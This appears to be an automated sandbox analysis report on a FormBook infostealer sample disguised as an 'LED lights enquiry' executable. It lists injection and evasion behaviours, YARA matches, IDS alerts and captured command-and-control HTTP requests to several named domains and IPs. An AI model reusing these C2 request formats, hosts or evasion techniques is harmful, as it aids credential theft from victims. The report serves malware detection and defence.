Windows Analysis Report
ENQUIRY LED LIGHTS.pif.exe

Overview

General Information

Sample name: ENQUIRY LED LIGHTS.pif.exe
Analysis ID: 1550102
MD5: 120c54a53b6678586cc21f6eefb3c3a5
SHA1: 52b149e7d7bfd16ef2b108e4ef4d8c6cd28cfab5
SHA256: 8311884c536e402615c44c0010553cb85718a79a82fa59f90bbdc79321cc60c5
Tags: exe, pif, user-abuse_ch
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • ENQUIRY LED LIGHTS.pif.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe" MD5: 120C54A53B6678586CC21F6EEFB3C3A5)
    • ENQUIRY LED LIGHTS.pif.exe (PID: 7456 cmdline: "C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe" MD5: 120C54A53B6678586CC21F6EEFB3C3A5)
    • ENQUIRY LED LIGHTS.pif.exe (PID: 7464 cmdline: "C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe" MD5: 120C54A53B6678586CC21F6EEFB3C3A5)
      • bdtKgWWjtPR.exe (PID: 4432 cmdline: "C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • SearchFilterHost.exe (PID: 7892 cmdline: "C:\Windows\SysWOW64\SearchFilterHost.exe" MD5: 1D221E674AC34BC114C91B8D56468315)
          • bdtKgWWjtPR.exe (PID: 2332 cmdline: "C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8148 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 00000009.00000002.2977288553.0000000002680000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 00000009.00000002.2977288553.0000000002680000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2f190:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x1725f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 |
| 00000008.00000002.2977216188.0000000005040000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 00000008.00000002.2977216188.0000000005040000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2bf40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x1400f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 |
| 00000008.00000002.2977133044.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2fb9f:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x17c6e:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 |
| 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2ef9f:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x1706e:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 |
            No Sigma rule has matched
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2024-11-06T13:41:20.543853+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.4 | 49735 | TCP |
| 2024-11-06T13:41:42.019215+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.4 | 51155 | TCP |
| 2024-11-06T13:41:43.858729+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.4 | 51156 | TCP |
| 2024-11-06T13:42:07.383224+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 51201 | 3.33.130.190 | 80 | TCP |
| 2024-11-06T13:42:36.169295+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 51358 | 75.2.103.23 | 80 | TCP |
| 2024-11-06T13:42:59.693800+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 51430 | 172.67.163.171 | 80 | TCP |
| 2024-11-06T13:42:07.383224+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 51201 | 3.33.130.190 | 80 | TCP |
| 2024-11-06T13:42:36.169295+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 51358 | 75.2.103.23 | 80 | TCP |
| 2024-11-06T13:42:59.693800+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 51430 | 172.67.163.171 | 80 | TCP |
| 2024-11-06T13:42:28.498327+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 51315 | 75.2.103.23 | 80 | TCP |
| 2024-11-06T13:42:31.003463+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 51329 | 75.2.103.23 | 80 | TCP |
| 2024-11-06T13:42:33.735051+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 51345 | 75.2.103.23 | 80 | TCP |
| 2024-11-06T13:42:50.990838+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 51427 | 172.67.163.171 | 80 | TCP |
| 2024-11-06T13:42:53.615741+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 51428 | 172.67.163.171 | 80 | TCP |
| 2024-11-06T13:42:56.271768+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 51429 | 172.67.163.171 | 80 | TCP |
| 2024-11-06T13:43:06.146500+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 51431 | 162.0.231.203 | 80 | TCP |
| 2024-11-06T13:43:08.752984+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 51432 | 162.0.231.203 | 80 | TCP |
| 2024-11-06T13:43:11.920944+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 51433 | 162.0.231.203 | 80 | TCP |

            AV Detection

Source: ENQUIRY LED LIGHTS.pif.exe | ReversingLabs: Detection: 26%
Source: Yara match | File source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.2977288553.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2977216188.0000000005040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2977133044.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2071235910.0000000004630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2069154376.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: ENQUIRY LED LIGHTS.pif.exe | Joe Sandbox ML: detected
Source: ENQUIRY LED LIGHTS.pif.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ENQUIRY LED LIGHTS.pif.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bdtKgWWjtPR.exe, 00000007.00000000.1985350968.00000000001AE000.00000002.00000001.01000000.0000000C.sdmp, bdtKgWWjtPR.exe, 00000009.00000000.2288490724.00000000001AE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: ENQUIRY LED LIGHTS.pif.exe, 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000003.2075226084.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000003.2085919169.0000000004F90000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: SearchFilterHost.pdbUGP source: bdtKgWWjtPR.exe, 00000007.00000002.2976848441.0000000001208000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: ENQUIRY LED LIGHTS.pif.exe, ENQUIRY LED LIGHTS.pif.exe, 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, SearchFilterHost.exe, SearchFilterHost.exe, 00000008.00000003.2075226084.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000003.2085919169.0000000004F90000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: SearchFilterHost.pdb source: bdtKgWWjtPR.exe, 00000007.00000002.2976848441.0000000001208000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\SearchFilterHost.exe | Code function: 8_2_032AC410 FindFirstFileW,FindNextFileW,FindClose, 8_2_032AC410
Source: C:\Windows\SysWOW64\SearchFilterHost.exe | Code function: 4x nop then xor eax, eax 8_2_03299BC0
Source: C:\Windows\SysWOW64\SearchFilterHost.exe | Code function: 4x nop then mov ebx, 00000004h 8_2_054904E8

            Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:51201 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:51201 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51329 -> 75.2.103.23:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51315 -> 75.2.103.23:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51345 -> 75.2.103.23:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:51358 -> 75.2.103.23:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:51358 -> 75.2.103.23:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51427 -> 172.67.163.171:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51428 -> 172.67.163.171:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51429 -> 172.67.163.171:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:51430 -> 172.67.163.171:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:51430 -> 172.67.163.171:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51432 -> 162.0.231.203:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51431 -> 162.0.231.203:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51433 -> 162.0.231.203:80
Source: Joe Sandbox View | IP Address: 75.2.103.23
Source: Joe Sandbox View | IP Address: 162.0.231.203
Source: Joe Sandbox View | IP Address: 3.33.130.190
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: AMAZONEXPANSIONGB
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:51155
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:51156
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49735
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /3wgj/?ZtyPTl=WahIZj+xW4EOtFjZM0RfH4og0GPWjtJKXvB/uzSyT+J27ktzn1W7D9+ZXG1vui76WddGh9yI59wk4TQKFvzjrMXbikQGJsnU4nQWN9yQ+zInnnXCjF8kPco=&ZbwL=jPj4WxVP-Pg HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en
    Host: www.ontoweightloss.health
    Connection: close
    User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
Source: global traffic | HTTP traffic detected: GET /b5w1/?ZtyPTl=bzIaAv/CNdT8rB9nL5XCeS9pdKyCtoE63OuxqOgiGohGR0wxghAT+4/hTXFB6xdR1WxfOWCw15kwsG97q/hVWyGWfRtZYXTzGedSrFAZ3YSj/Eq6qe9iIhY=&ZbwL=jPj4WxVP-Pg HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en
    Host: www.asklifeclarity.shop
    Connection: close
    User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
Source: global traffic | HTTP traffic detected: GET /umew/?ZtyPTl=QXTWCFaCrqsBcZ0jvGl1ttfHxXcpVNWda4HOn4zcEeaqQvbbnXannTD248WElJ9FFMtE83bbHMtecG5XDZ8D8EJV2R1Y4Xui2kuIw8EG0Z1Ay2DF3ANMa14=&ZbwL=jPj4WxVP-Pg HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en
    Host: www.waidzeitcz.shop
    Connection: close
    User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
Source: global traffic | DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global traffic | DNS traffic detected: DNS query: www.ontoweightloss.health
Source: global traffic | DNS traffic detected: DNS query: www.asklifeclarity.shop
Source: global traffic | DNS traffic detected: DNS query: www.worldoffun.online
Source: global traffic | DNS traffic detected: DNS query: www.waidzeitcz.shop
Source: global traffic | DNS traffic detected: DNS query: www.windowmart.online
Source: unknown | HTTP traffic detected: POST /b5w1/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en
    Host: www.asklifeclarity.shop
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 203
    Cache-Control: no-cache
    Origin: http://www.asklifeclarity.shop
    Referer: http://www.asklifeclarity.shop/b5w1/
    User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Date: Wed, 06 Nov 2024 12:42:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Vary: Accept-Encoding
    X-Powered-By: PHP/8.2.19
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Link: <https://www.waidzeitcz.shop/wp-json/>; rel="https://api.w.org/"
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DLF1EiCwzp0ip6TLXPZbsx%2FOX7C8UYiqG3GfV0vU5hz3fFNUDNMcl733jJu8e%2FuBmEnjfqgSJRDOBBV9Ou2UFrXWbeUoFad9dv%2Bb3V1ItCdFkrTfh3rNVMvgxHhRF4%2BCSyO1QPAZ"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8de52a9f998b4635-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1072&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=503&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Date: Wed, 06 Nov 2024 12:43:05 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Date: Wed, 06 Nov 2024 12:43:08 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Date: Wed, 06 Nov 2024 12:43:11 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=7.8
Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ve
Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.
Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/porto-functionality/builders/assets/type-builder.css?v
Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/porto-functionality/shortcodes//assets/cp-attribute-ta
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/revslider/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=wc-
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slnt
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/fonts/cardo_normal_400.woff2
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/accounting/accounting.min.js?ver
